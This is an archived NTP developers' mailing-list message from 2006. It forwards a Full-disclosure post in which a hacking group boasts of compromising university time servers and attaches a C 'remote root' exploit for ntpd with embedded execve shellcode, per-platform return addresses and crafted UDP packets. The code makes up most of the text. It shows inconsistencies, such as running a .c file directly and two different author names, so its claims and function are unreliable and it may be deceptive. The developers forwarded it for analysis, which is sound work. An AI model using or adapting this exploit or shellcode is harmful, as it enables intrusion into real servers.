[ntp:security] [Fwd: Re: [ntp:hackers] re: [Fwd: [Full-disclosure] ntpd stack evasion 0day exploit]]

Danny Mayer mayer at ntp.isc.org
Tue Jan 10 23:21:03 UTC 2006



-------- Original Message --------
Subject: Re: [ntp:hackers] re: [Fwd: [Full-disclosure] ntpd stack
evasion 0day	exploit]
Date: Tue, 10 Jan 2006 22:11:34 +0000
From: Paul Vixie <paul at vix.com>
To: hackers at ntp.isc.org
CC: mills at udel.edu
References: <20060110220956.B284811426 at sa.vix.com>

here it is, for those who won't use the web interface to find the
attachment:

------- Forwarded Message

X-Account-Key: account4
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com;
	h=received:message-id:date:from:to:subject:mime-version:content-type;
	b=T2c2uh56Eb/LuJBvQlwy3KuZ+Ci6UE7C9juIB/a+9q2BZlHzbOuN8u6xeaO3a+ZISf/Lhldek4LxkscwjKLVMgSKarrTTksU7RKJeSiZD7/wTCqswfLKlLcWSpPP3KTyDZDQYMD4spxi9MB+1KKaCseAG8K6gkp5T9V9UqUA100=
Date: Tue, 10 Jan 2006 16:05:22 -0200
From: !bSt bitwarz Security Team <bitwarz at gmail.com>
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] ntpd stack evasion 0day exploit
Sender: full-disclosure-bounces at lists.grok.org.uk

We are a cell of pr0j3kt m4yh3m in Latin America and western Europe.
We have owned many research centers in Latin America, for example the
ntp server at Observatorio Nacional, USP and UFRJ, in Brazil, home of our
member
ronaldinh0 and in many european universities,specially those ones knownby
their
high-profile computer science departments That's all. Keep the fucking
pr0j3kt m4yh3m
alive. Don't be confused by the evil words of
the CISSPs and white hats.

<-->ntpd_stack_evasion.c<-->
/* ntpd remote root no-exec stack evasion spl0it
 * by m0sk0v
 *
 * Ntpd is time protocol most used in *nix distros.
 *
 * Due to a buffer overflow in dump_srv.c is possible to execute
 * arbitrary code in remote host by setting "HUG=" variable
 * upon time protocol.
 *
 * This works even on stack protection using heap to
 * alock data
 *
 * 0day!!!!!
 * 0day!!!!!
 * 0day!!!!!
 * 0day!!!!!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 *
 *
 * Gr33tZ to :
 * Marcos Flavio Assuncao (defhack.com), Denny Roger/www.batori.com.br (thx
for
 * the shellcode, buddy!), ACME Security (www.acmesecurity.org), ksh
 *
 * [m0sk0v at cipsko m0sk0v]$ ./ntpd_stack_evasion.c -t2 localhost
 * ntpd_stack_evasion.c by m0sk0v
 *
 * Selected platform: RedHat Linux 9.0 with ntpd 4.0.99k-RPM (/tmp/sh)
 *
 * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
 * [1] <- evil query (pkt = 512 | shell = 45)
 * [2] <- null query (pkt = 12)
 * /tmp/sh was hacked.
 * [m0sk0v at cipsko m0sk0v]$ ls -al /tmp/suid-shell
 * -rwsr-xr-x    1 root     bin       512540 Aug 22  2005 /tmp/suid-shell
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>

#define NOP    0x90
#define ADDRS    8
#define PKTSIZ    512

static char usage[] = "Use: ntpd_stack_evasion.c [-o offset] <-t type>
<hostname>";

/* generic execve() shellcodes */

char lin_execve[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

char bsd_execve[] =
 /* specially made by denny at batori.com.br for ntpd_stack_evasion.c by m0sk0v
*/
 /* thanks for that, buddy! */
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/suid-shell\x01\x01"

"\x01\x01\x02\x02\x02\x02\x03\x00\x03\x03\x03\x9a\x04\x04\x04\x07\x04";

struct platforms
{
    char *os;
    char *version;
    char *code;
    long ret;
    int align;
    int shalign;
    int port;
};


struct platforms targ[] =
{
    { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
        0xbfbff8bc, 200, 220, 0 },

    { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
        0xbfbff540, 200, 220, 0 },

    { "RedHat Linux 9.0", "4.0.99k-RPM (/tmp/suid-shell)", lin_execve,
        0xbffff777, 240, 160, 0 },

    { NULL, NULL, NULL, 0x0, 0, 0, 0 }
};

long getip(name)
char *name;
{
    struct hostent *hp;
    long ip;
    extern int h_errno;

    if ((ip = inet_addr(name)) < 0)
    {
        if (!(hp = gethostbyname(name)))
        {
            fprintf(stderr, "gethostbyname(): %s\n",
                strerror(h_errno));
            exit(1);
        }
        memcpy(&ip, (hp->h_addr), 4);
    }

    return ip;
}

int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
    /* tcpdump-based reverse engineering :)) */

    char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
              0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
              0x74, 0x75, 0x6d, 0x3d };

    char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
              0x00, 0x00, 0x00, 0x00 };

    char buf[PKTSIZ], *p;
    long *ap;
    int i;

    int sockfd;
    struct sockaddr_in sa;

    bzero(&sa, sizeof(sa));

    sa.sin_family = AF_INET;
    sa.sin_port = htons(123);
    sa.sin_addr.s_addr = getip(host);

    if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
    {
        perror("socket");
        return -1;
    }

    if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
    {
        perror("connect");
        close(sockfd);
        return -1;
    }

    memset(buf, NOP, PKTSIZ);
    memcpy(buf, q2, sizeof(q2));

    p = buf + align;
    ap = (unsigned long *)p;

    for(i=0;i<ADDRS/4;i++)
        *ap++ = ret;

    p = (char *)ap;

    memcpy(buf+shalign, shellcode, strlen(shellcode));

    if((write(sockfd, buf, PKTSIZ)) < 0)
    {
        perror("write");
        close(sockfd);
        return -1;
    }

    fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
        strlen(shellcode));
    fflush(stderr);

        if ((write(sockfd, q3, sizeof(q3))) < 0)
        {
                perror("write");
                close(sockfd);
                return -1;
        }

    fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
    fflush(stderr);

    close(sockfd);

    return 0;
}

int main(argc, argv)
int argc;
char **argv;
{
    extern int optind, opterr;
    extern char *optarg;
    int ch, type, ofs, i;
    long ret;

    opterr = ofs = 0;
    type = -1;

    while ((ch = getopt(argc, argv, "t:o:")) != -1)
        switch((char)ch)
        {
            case 't':
                type = atoi(optarg);
                break;

            case 'o':
                ofs = atoi(optarg);
                break;

            case '?':
            default:
                puts(usage);
                exit(0);

        }

    argc -= optind;
    argv += optind;

    fprintf(stderr, "ntpd_stack_evasion.c by m0sk1t0\n\n");

    if (type < 0)
    {
        fprintf(stderr, "Please select platform:\n");
        for (i=0;targ[i].os;i++)
        {
            fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
            targ[i].os, targ[i].version, (void *)targ[i].ret);
        }

        exit(0);
    }

    fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
            targ[type].os, targ[type].version);

    ret = targ[type].ret;
    ret += ofs;

    if (argc != 1)
    {
        puts(usage);
        exit(0);
    }

    fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
        (void *)ret, targ[type].align, targ[type].shalign);

    if (doquery(*argv, ret, targ[type].code, targ[type].align,
        targ[type].shalign) < 0)
    {
        fprintf(stderr, "Failed.\n");
        exit(1);
    }

    fprintf(stderr, "Done.\n");

    if (!targ[type].port)
    {
        fprintf(stderr, "/tmp/suid-shell was hacked.\n");
        exit(0);
    }

    exit(0);
}
<-->ntpd_stack_evasion.c<-->

Thanks to Denny Roger @ Batori Software for his support

--
bitwarz Security Team  !bST
http://bitwarz.narod.ru

# Save a bug, kill a white hat!

-------- End Forwarded Message
_______________________________________________
hackers mailing list
hackers at support.ntp.org
https://support.ntp.org/mailman/listinfo/hackers



More information about the security mailing list